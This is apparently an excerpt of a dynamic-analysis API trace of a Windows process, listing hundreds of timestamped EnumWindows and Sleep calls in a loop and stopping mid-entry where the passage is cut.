[0218.487] Sleep (dwMilliseconds=0x64) [0218.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.625] Sleep (dwMilliseconds=0x64) [0218.667] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.667] Sleep (dwMilliseconds=0x64) [0218.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.719] Sleep (dwMilliseconds=0x64) [0218.752] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.753] Sleep (dwMilliseconds=0x64) [0218.764] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.765] Sleep (dwMilliseconds=0x64) [0218.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.781] Sleep (dwMilliseconds=0x64) [0218.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.829] Sleep (dwMilliseconds=0x64) [0218.860] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.861] Sleep (dwMilliseconds=0x64) [0218.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.873] Sleep (dwMilliseconds=0x64) [0218.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.891] Sleep (dwMilliseconds=0x64) [0218.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.939] Sleep (dwMilliseconds=0x64) [0218.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.969] Sleep (dwMilliseconds=0x64) [0218.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0218.982] Sleep (dwMilliseconds=0x64) [0219.009] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.014] Sleep (dwMilliseconds=0x64) [0219.139] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.140] Sleep (dwMilliseconds=0x64) [0219.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.185] Sleep (dwMilliseconds=0x64) [0219.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.232] Sleep (dwMilliseconds=0x64) [0219.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.281] Sleep (dwMilliseconds=0x64) [0219.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.314] Sleep (dwMilliseconds=0x64) [0219.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.328] Sleep (dwMilliseconds=0x64) [0219.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.343] Sleep (dwMilliseconds=0x64) [0219.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.391] Sleep (dwMilliseconds=0x64) [0219.410] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.411] Sleep (dwMilliseconds=0x64) [0219.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.420] Sleep (dwMilliseconds=0x64) [0219.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.450] Sleep (dwMilliseconds=0x64) [0219.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.500] Sleep (dwMilliseconds=0x64) [0219.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.547] Sleep (dwMilliseconds=0x64) [0219.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.594] Sleep (dwMilliseconds=0x64) [0219.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.654] Sleep (dwMilliseconds=0x64) [0219.693] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.693] Sleep (dwMilliseconds=0x64) [0219.701] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.702] Sleep (dwMilliseconds=0x64) [0219.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.716] Sleep (dwMilliseconds=0x64) [0219.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.766] Sleep (dwMilliseconds=0x64) [0219.793] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.794] Sleep (dwMilliseconds=0x64) [0219.823] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.824] Sleep (dwMilliseconds=0x64) [0219.876] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.877] Sleep (dwMilliseconds=0x64) [0219.920] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.921] Sleep (dwMilliseconds=0x64) [0219.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0219.971] Sleep (dwMilliseconds=0x64) [0220.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.016] Sleep (dwMilliseconds=0x64) [0220.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.116] Sleep (dwMilliseconds=0x64) [0220.154] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.155] Sleep (dwMilliseconds=0x64) [0220.168] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.169] Sleep (dwMilliseconds=0x64) [0220.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.219] Sleep (dwMilliseconds=0x64) [0220.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.250] Sleep (dwMilliseconds=0x64) [0220.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.360] Sleep (dwMilliseconds=0x64) [0220.376] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.377] Sleep (dwMilliseconds=0x64) [0220.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.422] Sleep (dwMilliseconds=0x64) [0220.444] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.445] Sleep (dwMilliseconds=0x64) [0220.449] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.450] Sleep (dwMilliseconds=0x64) [0220.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.468] Sleep (dwMilliseconds=0x64) [0220.514] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.515] Sleep (dwMilliseconds=0x64) [0220.534] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.534] Sleep (dwMilliseconds=0x64) [0220.545] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.546] Sleep (dwMilliseconds=0x64) [0220.577] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.577] Sleep (dwMilliseconds=0x64) [0220.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.722] Sleep (dwMilliseconds=0x64) [0220.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.731] Sleep (dwMilliseconds=0x64) [0220.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.747] Sleep (dwMilliseconds=0x64) [0220.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.763] Sleep (dwMilliseconds=0x64) [0220.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.778] Sleep (dwMilliseconds=0x64) [0220.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.795] Sleep (dwMilliseconds=0x64) [0220.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.809] Sleep (dwMilliseconds=0x64) [0220.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.825] Sleep (dwMilliseconds=0x64) [0220.842] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.842] Sleep (dwMilliseconds=0x64) [0220.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.856] Sleep (dwMilliseconds=0x64) [0220.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.873] Sleep (dwMilliseconds=0x64) [0220.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.890] Sleep (dwMilliseconds=0x64) [0220.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.903] Sleep (dwMilliseconds=0x64) [0220.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.920] Sleep (dwMilliseconds=0x64) [0220.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.934] Sleep (dwMilliseconds=0x64) [0220.951] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.953] Sleep (dwMilliseconds=0x64) [0220.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.967] Sleep (dwMilliseconds=0x64) [0220.982] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.983] Sleep (dwMilliseconds=0x64) [0220.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0220.998] Sleep (dwMilliseconds=0x64) [0221.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.014] Sleep (dwMilliseconds=0x64) [0221.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.029] Sleep (dwMilliseconds=0x64) [0221.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.045] Sleep (dwMilliseconds=0x64) [0221.086] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.088] Sleep (dwMilliseconds=0x64) [0221.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.091] Sleep (dwMilliseconds=0x64) [0221.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.172] Sleep (dwMilliseconds=0x64) [0221.241] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.242] Sleep (dwMilliseconds=0x64) [0221.253] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.253] Sleep (dwMilliseconds=0x64) [0221.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.281] Sleep (dwMilliseconds=0x64) [0221.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.328] Sleep (dwMilliseconds=0x64) [0221.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.344] Sleep (dwMilliseconds=0x64) [0221.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.360] Sleep (dwMilliseconds=0x64) [0221.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.407] Sleep (dwMilliseconds=0x64) [0221.523] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.524] Sleep (dwMilliseconds=0x64) [0221.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.564] Sleep (dwMilliseconds=0x64) [0221.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.605] Sleep (dwMilliseconds=0x64) [0221.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.657] Sleep (dwMilliseconds=0x64) [0221.689] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.690] Sleep (dwMilliseconds=0x64) [0221.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.704] Sleep (dwMilliseconds=0x64) [0221.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.718] Sleep (dwMilliseconds=0x64) [0221.764] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.765] Sleep (dwMilliseconds=0x64) [0221.783] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.784] Sleep (dwMilliseconds=0x64) [0221.797] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.797] Sleep (dwMilliseconds=0x64) [0221.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.827] Sleep (dwMilliseconds=0x64) [0221.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.875] Sleep (dwMilliseconds=0x64) [0221.936] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.937] Sleep (dwMilliseconds=0x64) [0221.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.986] Sleep (dwMilliseconds=0x64) [0221.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0221.998] Sleep (dwMilliseconds=0x64) [0222.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.017] Sleep (dwMilliseconds=0x64) [0222.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.063] Sleep (dwMilliseconds=0x64) [0222.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.125] Sleep (dwMilliseconds=0x64) [0222.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.141] Sleep (dwMilliseconds=0x64) [0222.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.173] Sleep (dwMilliseconds=0x64) [0222.220] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.221] Sleep (dwMilliseconds=0x64) [0222.238] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.239] Sleep (dwMilliseconds=0x64) [0222.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.247] Sleep (dwMilliseconds=0x64) [0222.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.281] Sleep (dwMilliseconds=0x64) [0222.328] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.329] Sleep (dwMilliseconds=0x64) [0222.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.345] Sleep (dwMilliseconds=0x64) [0222.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.357] Sleep (dwMilliseconds=0x64) [0222.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.391] Sleep (dwMilliseconds=0x64) [0222.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.438] Sleep (dwMilliseconds=0x64) [0222.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.502] Sleep (dwMilliseconds=0x64) [0222.548] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.550] Sleep (dwMilliseconds=0x64) [0222.583] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.585] Sleep (dwMilliseconds=0x64) [0222.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.592] Sleep (dwMilliseconds=0x64) [0222.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.611] Sleep (dwMilliseconds=0x64) [0222.655] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.656] Sleep (dwMilliseconds=0x64) [0222.683] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.685] Sleep (dwMilliseconds=0x64) [0222.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.703] Sleep (dwMilliseconds=0x64) [0222.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.751] Sleep (dwMilliseconds=0x64) [0222.768] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.769] Sleep (dwMilliseconds=0x64) [0222.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.781] Sleep (dwMilliseconds=0x64) [0222.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.813] Sleep (dwMilliseconds=0x64) [0222.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.860] Sleep (dwMilliseconds=0x64) [0222.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.922] Sleep (dwMilliseconds=0x64) [0222.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.971] Sleep (dwMilliseconds=0x64) [0222.987] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0222.987] Sleep (dwMilliseconds=0x64) [0222.999] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.000] Sleep (dwMilliseconds=0x64) [0223.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.032] Sleep (dwMilliseconds=0x64) [0223.119] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.120] Sleep (dwMilliseconds=0x64) [0223.150] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.151] Sleep (dwMilliseconds=0x64) [0223.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.173] Sleep (dwMilliseconds=0x64) [0223.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.219] Sleep (dwMilliseconds=0x64) [0223.258] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.259] Sleep (dwMilliseconds=0x64) [0223.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.313] Sleep (dwMilliseconds=0x64) [0223.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.346] Sleep (dwMilliseconds=0x64) [0223.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.358] Sleep (dwMilliseconds=0x64) [0223.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.375] Sleep (dwMilliseconds=0x64) [0223.422] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.423] Sleep (dwMilliseconds=0x64) [0223.456] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.456] Sleep (dwMilliseconds=0x64) [0223.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.466] Sleep (dwMilliseconds=0x64) [0223.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.484] Sleep (dwMilliseconds=0x64) [0223.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.531] Sleep (dwMilliseconds=0x64) [0223.552] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.552] Sleep (dwMilliseconds=0x64) [0223.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.559] Sleep (dwMilliseconds=0x64) [0223.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.594] Sleep (dwMilliseconds=0x64) [0223.639] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.640] Sleep (dwMilliseconds=0x64) [0223.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.703] Sleep (dwMilliseconds=0x64) [0223.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.733] Sleep (dwMilliseconds=0x64) [0223.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.747] Sleep (dwMilliseconds=0x64) [0223.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.797] Sleep (dwMilliseconds=0x64) [0223.830] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.830] Sleep (dwMilliseconds=0x64) [0223.842] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.843] Sleep (dwMilliseconds=0x64) [0223.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.891] Sleep (dwMilliseconds=0x64) [0223.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.936] Sleep (dwMilliseconds=0x64) [0223.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0223.984] Sleep (dwMilliseconds=0x64) [0224.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.015] Sleep (dwMilliseconds=0x64) [0224.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.037] Sleep (dwMilliseconds=0x64) [0224.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.063] Sleep (dwMilliseconds=0x64) [0224.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.157] Sleep (dwMilliseconds=0x64) [0224.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.173] Sleep (dwMilliseconds=0x64) [0224.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.185] Sleep (dwMilliseconds=0x64) [0224.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.219] Sleep (dwMilliseconds=0x64) [0224.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.266] Sleep (dwMilliseconds=0x64) [0224.286] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.287] Sleep (dwMilliseconds=0x64) [0224.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.294] Sleep (dwMilliseconds=0x64) [0224.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.313] Sleep (dwMilliseconds=0x64) [0224.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.360] Sleep (dwMilliseconds=0x64) [0224.386] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.387] Sleep (dwMilliseconds=0x64) [0224.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.407] Sleep (dwMilliseconds=0x64) [0224.453] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.454] Sleep (dwMilliseconds=0x64) [0224.476] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.476] Sleep (dwMilliseconds=0x64) [0224.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.481] Sleep (dwMilliseconds=0x64) [0224.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.500] Sleep (dwMilliseconds=0x64) [0224.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.547] Sleep (dwMilliseconds=0x64) [0224.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.564] Sleep (dwMilliseconds=0x64) [0224.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.575] Sleep (dwMilliseconds=0x64) [0224.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.607] Sleep (dwMilliseconds=0x64) [0224.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.658] Sleep (dwMilliseconds=0x64) [0224.673] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.674] Sleep (dwMilliseconds=0x64) [0224.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.688] Sleep (dwMilliseconds=0x64) [0224.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.719] Sleep (dwMilliseconds=0x64) [0224.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.766] Sleep (dwMilliseconds=0x64) [0224.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.782] Sleep (dwMilliseconds=0x64) [0224.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.797] Sleep (dwMilliseconds=0x64) [0224.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.830] Sleep (dwMilliseconds=0x64) [0224.875] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.876] Sleep (dwMilliseconds=0x64) [0224.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.905] Sleep (dwMilliseconds=0x64) [0224.923] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.924] Sleep (dwMilliseconds=0x64) [0224.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0224.970] Sleep (dwMilliseconds=0x64) [0225.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.125] Sleep (dwMilliseconds=0x64) [0225.142] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.143] Sleep (dwMilliseconds=0x64) [0225.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.158] Sleep (dwMilliseconds=0x64) [0225.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.203] Sleep (dwMilliseconds=0x64) [0225.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.251] Sleep (dwMilliseconds=0x64) [0225.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.297] Sleep (dwMilliseconds=0x64) [0225.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.344] Sleep (dwMilliseconds=0x64) [0225.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.406] Sleep (dwMilliseconds=0x64) [0225.443] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.444] Sleep (dwMilliseconds=0x64) [0225.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.453] Sleep (dwMilliseconds=0x64) [0225.514] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.515] Sleep (dwMilliseconds=0x64) [0225.583] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.584] Sleep (dwMilliseconds=0x64) [0225.645] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.646] Sleep (dwMilliseconds=0x64) [0225.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.719] Sleep (dwMilliseconds=0x64) [0225.739] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.739] Sleep (dwMilliseconds=0x64) [0225.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.750] Sleep (dwMilliseconds=0x64) [0225.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.782] Sleep (dwMilliseconds=0x64) [0225.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.829] Sleep (dwMilliseconds=0x64) [0225.864] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.865] Sleep (dwMilliseconds=0x64) [0225.871] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.872] Sleep (dwMilliseconds=0x64) [0225.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.891] Sleep (dwMilliseconds=0x64) [0225.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.939] Sleep (dwMilliseconds=0x64) [0225.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0225.986] Sleep (dwMilliseconds=0x64) [0226.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.048] Sleep (dwMilliseconds=0x64) [0226.132] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.133] Sleep (dwMilliseconds=0x64) [0226.152] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.153] Sleep (dwMilliseconds=0x64) [0226.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.310] Sleep (dwMilliseconds=0x64) [0226.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.359] Sleep (dwMilliseconds=0x64) [0226.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.375] Sleep (dwMilliseconds=0x64) [0226.418] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.419] Sleep (dwMilliseconds=0x64) [0226.455] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.456] Sleep (dwMilliseconds=0x64) [0226.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.468] Sleep (dwMilliseconds=0x64) [0226.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.484] Sleep (dwMilliseconds=0x64) [0226.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.532] Sleep (dwMilliseconds=0x64) [0226.550] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.550] Sleep (dwMilliseconds=0x64) [0226.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.559] Sleep (dwMilliseconds=0x64) [0226.591] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.594] Sleep (dwMilliseconds=0x64) [0226.639] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.640] Sleep (dwMilliseconds=0x64) [0226.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.703] Sleep (dwMilliseconds=0x64) [0226.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.735] Sleep (dwMilliseconds=0x64) [0226.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.747] Sleep (dwMilliseconds=0x64) [0226.764] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.765] Sleep (dwMilliseconds=0x64) [0226.809] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.815] Sleep (dwMilliseconds=0x64) [0226.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.842] Sleep (dwMilliseconds=0x64) [0226.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.860] Sleep (dwMilliseconds=0x64) [0226.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.907] Sleep (dwMilliseconds=0x64) [0226.925] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.925] Sleep (dwMilliseconds=0x64) [0226.934] EnumWindows (lpEnumFunc=0x563dd0, 